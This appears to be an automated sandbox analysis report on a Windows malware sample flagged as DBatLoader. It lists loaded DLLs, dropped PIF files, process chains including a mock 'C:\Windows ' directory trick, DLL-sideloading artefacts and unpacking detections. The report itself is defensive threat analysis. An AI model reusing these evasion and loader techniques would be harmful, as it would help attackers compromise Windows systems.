Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Section loaded: amsi.dll	Jump to behavior

Source: qDKTsL1y44.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal100.troj.evad.winEXE@16/9@4/3

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_04203458 GetLastError,FormatMessageA,

0_2_04203458

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_041E8F58 GetDiskFreeSpaceA,

0_2_041E8F58

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_041FEF94 CoCreateInstance,

0_2_041FEF94

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_041FA27C FindResourceA,LoadResource,SizeofResource,LockResource,

0_2_041FA27C

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

File created: C:\Users\Public\Libraries\Finqiaev.PIF

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
Source: C:\Users\Public\Libraries\veaiqniF.pif	Mutant created: \Sessions\1\BaseNamedObjects\HandleMeBaby

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\FinqiaevO.bat" "

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\Public\Libraries\veaiqniF.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: qDKTsL1y44.exe

ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

File read: C:\Users\user\Desktop\qDKTsL1y44.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\qDKTsL1y44.exe C:\Users\user\Desktop\qDKTsL1y44.exe
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\FinqiaevO.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Process created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Finqiaev.PIF "C:\Users\Public\Libraries\Finqiaev.PIF"
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Process created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Finqiaev.PIF "C:\Users\Public\Libraries\Finqiaev.PIF"
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Process created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pif
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\FinqiaevO.bat" "	Jump to behavior
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Process created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Process created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Finqiaev.PIF	Process created: C:\Users\Public\Libraries\veaiqniF.pif C:\Users\Public\Libraries\veaiqniF.pif	Jump to behavior

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: qDKTsL1y44.exe

Static file information: File size 2088448 > 1048576

Source: qDKTsL1y44.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x177e00

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\veaiqniF.pif	Unpacked PE file: 7.2.veaiqniF.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\Public\Libraries\veaiqniF.pif	Unpacked PE file: 10.2.veaiqniF.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\Public\Libraries\veaiqniF.pif	Unpacked PE file: 12.2.veaiqniF.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\veaiqniF.pif	Unpacked PE file: 7.2.veaiqniF.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\veaiqniF.pif	Unpacked PE file: 10.2.veaiqniF.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\veaiqniF.pif	Unpacked PE file: 12.2.veaiqniF.pif.400000.0.unpack

Yara detected DBatLoader

Source: Yara match	File source: 0.2.qDKTsL1y44.exe.41e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1362814847.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Source: veaiqniF.pif.0.dr

Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]

Source: C:\Users\user\Desktop\qDKTsL1y44.exe

Code function: 0_2_041FFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_041FFCD8

Source: initial sample

Static PE information: section where entry point is pointing to: .....

Source: netutils.dll.0.dr	Static PE information: real checksum: 0x21402 should be: 0x2599d
Source: qDKTsL1y44.exe	Static PE information: real checksum: 0x0 should be: 0x20c489
Source: Finqiaev.PIF.0.dr	Static PE information: real checksum: 0x0 should be: 0x20c489

Source: easinvoker.exe.0.dr	Static PE information: section name: .imrsiv
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: /4
Source: netutils.dll.0.dr	Static PE information: section name: /19
Source: netutils.dll.0.dr	Static PE information: section name: /31
Source: netutils.dll.0.dr	Static PE information: section name: /45
Source: netutils.dll.0.dr	Static PE information: section name: /57
Source: netutils.dll.0.dr	Static PE information: section name: /70
Source: netutils.dll.0.dr	Static PE information: section name: /81
Source: netutils.dll.0.dr	Static PE information: section name: /92

Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_042495F8 push 04249685h; ret	0_2_0424967D
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041F4434 push 041F44AAh; ret	0_2_041F44A2
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041F4432 push 041F44AAh; ret	0_2_041F44A2
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0420063B push 0420067Fh; ret	0_2_04200677
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0420063C push 0420067Fh; ret	0_2_04200677
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0423C67C push ecx; mov dword ptr [esp], edx	0_2_0423C681
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041E66FC push 041E6757h; ret	0_2_041E674F
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041E66FA push 041E6757h; ret	0_2_041E674F
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0424872C push 0424895Eh; ret	0_2_04248956
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_04238770 push 042387CAh; ret	0_2_042387C2
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041F6760 push ecx; mov dword ptr [esp], edx	0_2_041F6765
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0420008B push 042000CFh; ret	0_2_042000C7
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0420008C push 042000CFh; ret	0_2_042000C7
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_04238128 push 04238154h; ret	0_2_0423814C
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0420AC64 push 0420ACA2h; ret	0_2_0420AC9A
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0420CC74 push 0420CCB7h; ret	0_2_0420CCAF
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041F4DDC push 041F4E29h; ret	0_2_041F4E21
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0420CFA4 push 0420CFD0h; ret	0_2_0420CFC8
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041EE90C push 041EE938h; ret	0_2_041EE930
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_04214980 push 042149EBh; ret	0_2_042149E3
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041F69BC push ecx; mov dword ptr [esp], edx	0_2_041F69C1
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041F6ADC push ecx; mov dword ptr [esp], edx	0_2_041F6AE1
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041FEB14 push 041FEBBFh; ret	0_2_041FEBB7
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041FEB12 push 041FEBBFh; ret	0_2_041FEBB7
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041F6B20 push ecx; mov dword ptr [esp], edx	0_2_041F6B25
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_0420D468 push 0420D494h; ret	0_2_0420D48C
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041E3464 push eax; ret	0_2_041E34A0
Source: C:\Users\user\Desktop\qDKTsL1y44.exe	Code function: 0_2_041FD4D8 push ecx; mov dword ptr [esp], edx	0_2_041FD4DA
